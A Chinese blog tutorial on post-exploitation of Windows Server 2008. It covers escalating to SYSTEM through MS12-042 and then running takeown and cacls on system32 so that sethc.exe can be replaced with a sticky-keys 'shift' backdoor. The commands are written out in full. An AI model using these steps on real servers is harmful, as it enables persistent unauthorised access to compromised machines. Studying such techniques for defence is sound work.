后渗透篇:Windows 2008 server提权之突破系统权限安装shift后门
当你的才华
还撑不起你的野心时
那你就应该静下心来学习
目录
Windows 2008 server提权之突破系统权限安装shift后门
0x01 前言
0x02 主要操作部分
0x03 主要命令组成部分
Windows 2008 server提权之突破系统权限安装shift后门
0x01 前言
大家都知道08权限的系统权限设置很严格 面对限制IP连接的情况 我们及时拿到system权限 有账号也上不去
这种情况下只能弄shift后门 或者放大镜了 但08权限 在system权限也操作不了系统文件夹
普通权限 我用的到时MS12042 这个大家都会用单独讲sysret.exe 拿出了
我们找到w3wp.exe这个PID
然后
我就就获得想要的权限了
提权后 system权限
0x02 主要操作部分
不能操作系统文件夹
我自己搭建的环境 先用administrator账号 测试
还是不能操作
我用到了2个命令 配合使用能赋予权限能执行
takeown /f c:\windows\system32\*.* /a /r /d y 将权限目录下的所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)命令
在执行cacls c:\windows\system32\*.* /T /E /G administrators:F
目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制
然后系统文件夹权限
能替换sethcl了
问题也来了 只有管理员组能做了 权限 但是我们只有system权限 system权限依然不能操作 系统文件夹
我们将命令该成
cacls c:\windows\system32\*.* /T /E /G system:F
就能行了
0x03 主要命令组成部分
- # 发现拒绝访问。
- # 出现这样的情况我们就需要将将权限目录下的所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)命令
- takeown /f c:\windows\system32\*.* /a /r /d y
- # 目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制
- # 然后系统文件夹权限
- cacls c:\windows\system32\*.* /T /E /G administrators:F
- # 然后即可替换sethc了
- # 可是只有管理员组才能执行权限 但是我们只有system权限 system权限依然不能操作 系统文件夹
- # 我们将命令该成
- cacls c:\windows\system32\*.* /T /E /G system:F
参考链接:
https://www.cnblogs.com/swyft/p/5491762.html
https://www.cnblogs.com/h4ck0ne/p/5154672.html
我不需要自由,只想背着她的梦
一步步向前走,她给的永远不重
后渗透篇:Windows 2008 server提权之突破系统权限安装shift后门相关推荐
- 2008提权之突破系统权限安装shift后门
大家都知道08权限的系统权限设置很严格,且在2003系统中常用到的溢出工具都失效.面对限制IP连接的情况 我们及时拿到system权限 有账号也上不去 这种情况下只能弄shift后门 或者放大镜了.但 ...
- windows修改策略后执行命令_Windows 下的提权大合集
Windows 下的提权大合集 项目地址:https://github.com/lyshark/Windows-exploits Windows平台提权漏洞集合 项目地址:https://github ...
- 【数据库提权】- SQL Server提权
渗透测试往往由信息收集开始,而提权是渗透测试中较为重要的环节,若始终以"低权限"身份进行渗透,测试出的问题相对于高权限的质量会低很多,权限提升意味着用户获得不允许他使用的权限.比如 ...
- Microsoft Windows Win32k本地提权漏洞分析
漏洞信息 1 漏洞简介 漏洞名称:Microsoft Windows Win32k本地提权漏洞 漏洞编号:CVE-2015-2546 漏洞类型:UAF 影响范围:Windows 7 Service P ...
- 【经典漏洞回顾】Microsoft Windows Win32k本地提权漏洞分析(CVE-2015-0057)
漏洞信息 1 漏洞简介 漏洞名称:Microsoft Windows Win32k本地提权漏洞 漏洞编号:CVE-2015-0057 漏洞类型:UAF 影响范围:Windows Server 2003 ...
- winr8文件服务器,技术讨论 | Windows全版本提权之Win10系列解析
原标题:技术讨论 | Windows全版本提权之Win10系列解析 一. 背景介绍 2018 年 8 月 27 日,境外安全研究人员 SandboxEscaper 在其个人主页上披露了影响 Windo ...
- 提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权
一.初识提权 很多时候我们入侵一个网站的时候,想要的是得到这个服务器的权限,也就是admin权限,但是一般默认得到的是普通用的地权限,权限很小,所以就要通过其他手段,提升自己的权限. 提权是将服务器的 ...
- Oracle10g 64位 在Windows 2008 Server R2 中的安装 解决方案
背景: 操作系统Windows 2008 Server R2 要安装Oracle10g 64位版本 安装时出现如下错误: 检查操作系统版本:必须是5.0,5.1,5.2 or 6.0.实际为6.1 未 ...
- linux磁盘加密bitlocker,亲身体验Windows 2008 Server R2下的BitLocker驱动器加密
微软新近推出的一款磁盘加密工具BitLocker驱动器加密(BitLocker Drive Encryption)听说功能非常强,即使你的磁盘不幸丢失了,也无须担心其中的隐私数据被别人看到,因为即使把 ...
最新文章
- etcd 笔记(06)— Client 结构定义、客户端(初始化、KV存储Get、Put、事务 Txn、压缩 Compact、Watch、Lease
- hadoop 基础环境搭建(一)
- 去非数字字符串的前导零
- 如何使用eclipse创建项目
- 中国小吃文化名城掀“味蕾风暴”:故事抱团 欲刮全球
- 【DP】【递归】分离与合体
- 如何导入数据模板到MVC
- 复数四则运算 (15 分)
- 1192. [HNOI2006]鬼谷子的钱袋【进制】
- axure购物车加减实现
- [摘文]BizTalk概述
- JS代码对表格进行新增时无法解析HTML代码的解决方式
- 经验分享:使用谷歌浏览器下载想要的任意网页视频/音乐的方法
- SPSS实现距离分析
- excel锁定行,锁定列,同时锁定行和列
- 微信头像添加圣诞帽源码
- 5G通信光模块是什么?5G通信光模块的发展方向如何?
- 阿里云ECS-Centos7.9集群部署Redis服务遭木马攻击
- 高质量蓝牙耳机推荐,2023年热销火爆的蓝牙耳机推荐
- 渗透测试sec123笔记